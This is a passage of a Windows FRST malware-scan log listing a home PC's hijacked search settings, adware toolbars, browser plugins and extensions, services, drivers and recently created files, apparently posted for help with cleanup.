SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {23758B0B-0D9F-32A3-A476-D9B1033E7A1E} URL = hxxp://www.bing.com/search?q={searchTerms}&pc=ZUGO&form=ZGAIDF
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {2EDC592E-BE3B-45E6-9A09-3818FD7629D6} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=&apn_dtid=OSJ000&apn_uid=6B700B84-D3AD-42B9-8117-AA8044508D55&apn_sauid=7FF7FD87-FFF2-42ED-8F75-9A7D9889C78F
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL =
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {56256A51-B582-467e-B8D4-7786EDA79AE0} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=ZUxdm080YYus&ptnrS=ZUxdm080YYus&si=CN6I_MvxtqkCFcJ05QodXBLK-A&ptb=v2P0GRVCoTDCO9CyDZdlcg&ind=2011061422&n=77de5cae&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {57A65587-8AEC-4FF9-A3A3-32330322F26B} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA_enUS393US394
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {60C66211-88F6-486E-8303-B0B10E4FD293} URL =
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?q={SEARCHTERMS}&o=15527&l=dis&prt=360&chn=retail&geo=US&ver=4
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {B1243C39-DE64-4E02-BC80-265B7BD496B1} URL = hxxp://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3298582&CUI=UN25864562382803126&UM=2
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2013-07-29] (Oracle Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-01-02] (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2013-07-29] (Oracle Corporation)
BHO-x32: Secure Online Account Numbers Helper -> {435EAA86-D32B-484F-869C-53745FCB1642} -> C:\Program Files (x86)\Discover\SOAN\DiscoverSOANHelper.dll [2010-03-05] (Orbiscom Ltd. All rights reserved.)
BHO-x32: MixiDJ V46 Toolbar -> {62cad681-699f-4f83-b87f-95584003592f} -> C:\Program Files (x86)\MixiDJ_V46\prxtbMixi.dll [2013-05-16] ()
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll [2012-05-04] (Oracle Corporation)
BHO-x32: Fast Free Converter 4.1 -> {8232785C-5C98-4A6E-B7B4-911FFBED7582} -> C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\FastFreeConverter.dll [2013-11-21] (Fast Free Converter)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2015-12-01] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: No Name -> {9D425283-D487-4337-BAB6-AB8354A81457} -> No File
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-01-02] (Google Inc.)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll [2012-05-04] (Oracle Corporation)
BHO-x32: Google Gears Helper -> {E0FEFE40-FBF9-42AE-BA58-794CA7E3FB53} -> C:\Program Files (x86)\Google\Google Gears\Internet Explorer\0.5.36.0\gears.dll [2010-02-23] (Google Inc.)
BHO-x32: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll [2010-03-19] (<TOSHIBA>)
BHO-x32: Fast Free Converter 4.1 -> {F5580E24-8416-4DFD-90B3-078D4EDF4FCB} -> C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\FastFreeConverter.dll [2013-11-21] (Fast Free Converter)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-01-02] (Google Inc.)
Toolbar: HKLM-x32 - Secure Online Account Numbers - {A8C7C2CA-6DFD-4E16-8458-592361564D38} - C:\Program Files (x86)\Discover\SOAN\DiscoverSOANToolbar.dll [2010-03-05] (Orbiscom Ltd. All rights reserved.)
Toolbar: HKLM-x32 - No Name - {9D425283-D487-4337-BAB6-AB8354A81457} -  No File
Toolbar: HKLM-x32 - MixiDJ V46 Toolbar - {62cad681-699f-4f83-b87f-95584003592f} - C:\Program Files (x86)\MixiDJ_V46\prxtbMixi.dll [2013-05-16] ()
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-01-02] (Google Inc.)
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-01-02] (Google Inc.)
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {9D425283-D487-4337-BAB6-AB8354A81457} -  No File
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {8BDEA9D6-6F62-45EB-8EE9-8A81AF0D2F94} -  No File
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {62CAD681-699F-4F83-B87F-95584003592F} -  No File
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {A13C2648-91D4-4BF3-BC6D-0079707C4389} -  No File
DPF: HKLM-x32 {2FF8D282-F78A-4A33-ABC2-49E72A341482} hxxp://riteaid.storefront.com/images/global/activex/SFImageUpload1_10.CAB
DPF: HKLM-x32 {C7DEDA04-2FFF-4B81-AE66-0A0E0EF4AD2F} hxxp://www.ritzpix.com/net/Uploader/LPUploader57.cab
Handler-x32: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files (x86)\Belarc\BelarcAdvisor\System\BAVoilaX.dll [2013-03-29] (Belarc, Inc.)
Handler-x32: cozi - {5356518D-FE9C-4E08-9C1F-1E872ECD367F} - C:\Program Files (x86)\Cozi Express\CoziProtocolHandler.dll [2010-12-29] (Cozi Group, Inc.)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\Lexi\AppData\Roaming\Mozilla\Firefox\Profiles\s9ln76d7.default-1398562510049
FF NewTab: about:newtab
FF DefaultSearchEngine: Search Provided by Yahoo
FF DefaultSearchEngine.US: Google
FF SelectedSearchEngine: Search Provided by Yahoo
FF Homepage: hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DFirefox%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-10] ()
FF Plugin: @java.com/DTPlugin,version=10.25.2 -> C:\windows\system32\npDeployJava1.dll [2013-07-29] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2013-07-29] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-10] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2011-07-29] ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2013-01-11] (Foxit Corporation)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\windows\SysWOW64\npDeployJava1.dll [2013-07-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.5.1 -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll [2012-05-04] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-09-23] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-12-17] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2574262253-2623044021-4024016403-1001: amazon.com/AmazonMP3DownloaderPlugin -> C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin1017300.dll [2012-08-28] (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPcol400.dll [2010-12-14] (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPcol500.dll [2010-12-14] (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin6.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin7.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2012-10-19] (Coupons, Inc.)
FF Extension: Evernote Web Clipper - C:\Users\Lexi\AppData\Roaming\Mozilla\Firefox\Profiles\s9ln76d7.default-1398562510049\Extensions\{E0B8C461-F8FB-49b4-8373-FE32E9252800}.xpi [2015-12-08]
FF Extension: Skype extension - C:\Program Files (x86)\Mozilla Firefox\extensions\{AB2CE124-6272-4b12-94A9-7303C7397BD1} [2016-01-12] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{000a9d1c-beef-4f90-9363-039d445309b8}] - C:\Program Files (x86)\Google\Google Gears\Firefox
FF Extension: Google Gears - C:\Program Files (x86)\Google\Google Gears\Firefox [2010-08-20] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [discoversoan@orbiscom] - C:\Program Files (x86)\Discover\SOAN
FF Extension: Secure Online Account Numbers - C:\Program Files (x86)\Discover\SOAN [2010-11-20] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [extension@Fast_Free_Converter.com] - C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\extension@Fast_Free_Converter.com
FF Extension: No Name - C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\extension@Fast_Free_Converter.com [2016-03-08] [not signed]
FF HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Firefox\Extensions: [{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382}] - C:\Users\Lexi\AppData\Local\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382}
FF Extension: XULRunner - C:\Users\Lexi\AppData\Local\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382} [2010-09-19] [not signed]

Chrome:
=======
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\PepperFlash\pepflashplayer.dll => No File
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\pdf.dll => No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll => No File
CHR Plugin: (CouponNetwork Coupon Activator Netscape Plugin v. 5.0.0.0) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPcol400.dll (Catalina Marketing Corporation)
CHR Plugin: (CouponNetwork Coupon Activator Netscape Plugin v. 5.0.0.0) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPcol500.dll (Catalina Marketing Corporation)
CHR Plugin: (Coupons Inc., Coupon Printer Manager ) - C:\Program Files (x86)\Mozilla Firefox\plugins\npCouponPrinter.dll => No File
CHR Plugin: (Coupons Inc., Coupon Printer Manager ) - C:\Program Files (x86)\Mozilla Firefox\plugins\npMozCouponPrinter.dll => No File
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin6.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin7.dll (Apple Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (AmazonMP3DownloaderPlugin) - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin1017300.dll (Amazon.com, Inc.)
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll => No File
CHR Plugin: (DivX Web Player) - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll => No File
CHR Plugin: (Foxit Reader Plugin for Mozilla) - C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Picasa) - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll => No File
CHR Plugin: (Java Platform SE 7 U7) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Plugin: (McAfee Security Scanner +) - C:\Program Files (x86)\McAfee Security Scan\3.0.318\npMcAfeeMss.dll => No File
CHR Plugin: (My Web Search Plugin Stub) - C:\Program Files (x86)\MyWebSearch\bar\1.bin\NPMyWebS.dll => No File
CHR Plugin: (Windows Live® Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Shockwave Flash) - C:\windows\SysWOW64\Macromed\Flash\NPSWF32_11_6_602_180.dll => No File
CHR Plugin: (Java Deployment Toolkit 7.0.70.11) - C:\windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll => No File
CHR Profile: C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (The Best Price (extension)) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\gehjddhojclknjlgakpfmhlhkbpeakjf [2013-07-04]
CHR Extension: (Any.do Extension) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdadialhpiikehpdeejjeiikopddkjem [2016-03-08]
CHR Extension: (Evernote Web) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lbfehkoinhhcknnbdgnnmjhiladcgbol [2014-03-18]
CHR Extension: (Google Maps) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2015-09-28]
CHR Extension: (Springpad Extension) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\njhgeimnepehieioinbhmfpphfoocmng [2013-07-04]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-01]
CHR Extension: (My Chrome Theme) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\oehpjpccmlcalbenfhnacjeocbjdonic [2015-08-27]
CHR Extension: (Evernote Web Clipper) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\pioclpoplcdbaefihamjohnefbikjilc [2016-03-08]
CHR HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ccifdkgnonhkcmaoappjpmijdhlppgmg] - C:\Users\Lexi\AppData\Local\CRE\ccifdkgnonhkcmaoappjpmijdhlppgmg.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [ccifdkgnonhkcmaoappjpmijdhlppgmg] - C:\Users\Lexi\AppData\Local\CRE\ccifdkgnonhkcmaoappjpmijdhlppgmg.crx <not found>

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 ADVService; C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientService.exe [25704 2011-11-24] (Amazon.com) [File not signed]
R2 FastFreeConverterUpdt; C:\Program Files (x86)\Fast Free Converter\FastFreeConverterUpdt.exe [193024 2013-07-29] () [File not signed]
R2 LeapFrog Connect Device Service; C:\Program Files (x86)\LeapFrog\LeapFrog Connect\CommandService.exe [7241728 2014-07-11] (LeapFrog Enterprises, Inc.) [File not signed]
R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe [126392 2009-08-24] (Symantec Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [315648 2015-09-28] (Realtek Semiconductor)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-06-12] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 hitmanpro37; C:\windows\system32\drivers\hitmanpro37.sys [43664 2015-01-28] ()
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-07-10] (Realtek                                            )
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-06-12] (Synaptics Incorporated)
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2012-07-05] (Duplex Secure Ltd.)
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [45728 2015-08-27] (Toshiba Corporation)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-08 22:47 - 2016-03-08 22:48 - 02374144 _____ (Farbar) C:\Users\Lexi\Downloads\FRST64.exe
2016-03-08 22:11 - 2016-03-08 22:11 - 00016148 _____ C:\WINDOWS\system32\DURABLE_Lexi_HistoryPrediction.bin
2016-03-08 12:39 - 2016-03-08 12:39 - 00058675 _____ C:\Users\Lexi\Desktop\FRST.txt
2016-03-08 12:39 - 2016-03-08 12:39 - 00050962 _____ C:\Users\Lexi\Desktop\Addition.txt
2016-03-08 12:25 - 2016-03-08 12:39 - 00050962 _____ C:\Users\Lexi\Downloads\Addition.txt
2016-03-08 12:22 - 2016-03-08 22:56 - 00041575 _____ C:\Users\Lexi\Downloads\FRST.txt
2016-03-08 12:22 - 2016-03-08 22:56 - 00000000 ____D C:\FRST
2016-03-08 09:47 - 2016-03-08 22:03 - 00000000 ____D C:\Program Files (x86)\AdwCleaner
2016-03-08 09:28 - 2016-03-08 09:28 - 00001049 _____ C:\Users\Lexi\Documents\malwaresecondtime.txt
2016-03-08 09:27 - 2016-03-08 09:27 - 00081882 _____ C:\Users\Lexi\Documents\malwarfirsttime.txt
2016-03-07 23:01 - 2016-03-08 09:36 - 00000000 ____D C:\Users\Lexi\AppData\Local\Deployment
2016-03-06 21:09 - 2016-03-06 21:09 - 00058906 _____ C:\Users\Lexi\Desktop\sfcdetails.txt
2016-03-04 09:58 - 2016-03-08 22:06 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-03-04 09:58 - 2016-03-04 09:58 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-03 23:59 - 2016-03-07 13:16 - 00000000 ____D C:\AdwCleaner
2016-03-02 17:45 - 2016-03-02 17:45 - 00002675 _____ C:\Users\Lexi\Downloads\Your Great Value Vacations The notice on that all  documents are ready 20160003149979 _.html
2016-03-01 19:50 - 2016-03-01 19:50 - 00024404 _____ C:\Users\Lexi\Downloads\Aerobic Cellular Respiration Summary Table.pdf
2016-03-01 19:31 - 2016-03-01 19:31 - 00008986 _____ C:\Users\Lexi\Downloads\Cellular Respiration and Fermentation Study Guide (1).pdf
2016-03-01 19:30 - 2016-03-01 19:30 - 00008986 _____ C:\Users\Lexi\Downloads\Cellular Respiration and Fermentation Study Guide.pdf
